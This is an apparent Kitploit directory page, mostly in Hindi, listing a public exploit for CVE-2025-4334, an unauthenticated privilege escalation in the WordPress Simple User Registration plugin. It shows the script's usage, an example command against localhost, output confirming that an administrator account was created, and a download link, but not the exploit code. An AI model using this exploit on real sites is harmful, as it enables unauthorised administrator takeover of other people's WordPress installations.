Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4334 — सरल उपयोगकर्ता पंजीकरण <= 6.3 - अनप्रमाणित विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-4334
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-4334

CVE-2025-4334

सरल उपयोगकर्ता पंजीकरण <= 6.3 - अनप्रमाणित विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
7371 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔓 सरल उपयोगकर्ता पंजीकरण <= 6.3 - बिना प्रमाणीकरण के विशेषाधिकार वृद्धि

📄 विवरण

WordPress के लिए Simple User Registration प्लगइन 6.3 तक (और सहित) सभी संस्करणों में विशेषाधिकार वृद्धि के प्रति संवेदनशील है।
यह पंजीकरण के दौरान प्रदान किए जा सकने वाले उपयोगकर्ता मेटा मानों पर अपर्याप्त प्रतिबंधों के कारण है।
यह अप्रमाणित हमलावरों के लिए व्यवस्थापक के रूप में पंजीकरण करना संभव बनाता है।


🛡️ भेद्यता विवरण

  • प्रकार: अनुचित विशेषाधिकार प्रबंधन
  • CVE: CVE-2025-4334
  • CVSS स्कोर: 9.8 (गंभीर)
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • सार्वजनिक रूप से प्रकाशित: जून 25, 2025
  • अंतिम अद्यतन: जून 26, 2025

🛠️ शोषण स्क्रिप्ट

यह शोषण निकाले गए नॉन्स, फ़ॉर्म ID और रेफ़रर का उपयोग करके फ़ॉर्म सबमिशन के माध्यम से विशेषाधिकार वृद्धि को स्वचालित करता है।

⚙️ उपयोग

python CVE-2025-4334.py -h
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 URL स्पष्टीकरण

  • -u → बेस WordPress इंस्टॉलेशन (उदा. http://localhost/wordpress/)
  • --form → संवेदनशील पंजीकरण फ़ॉर्म का पूरा URL (उदा. http://localhost/wpr/default-registration/)

🧪 उदाहरण

python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ परिणाम

[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान की गई है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


द्वारा: Khaled_alenazi (Nxploited)

टूल डाउनलोड करें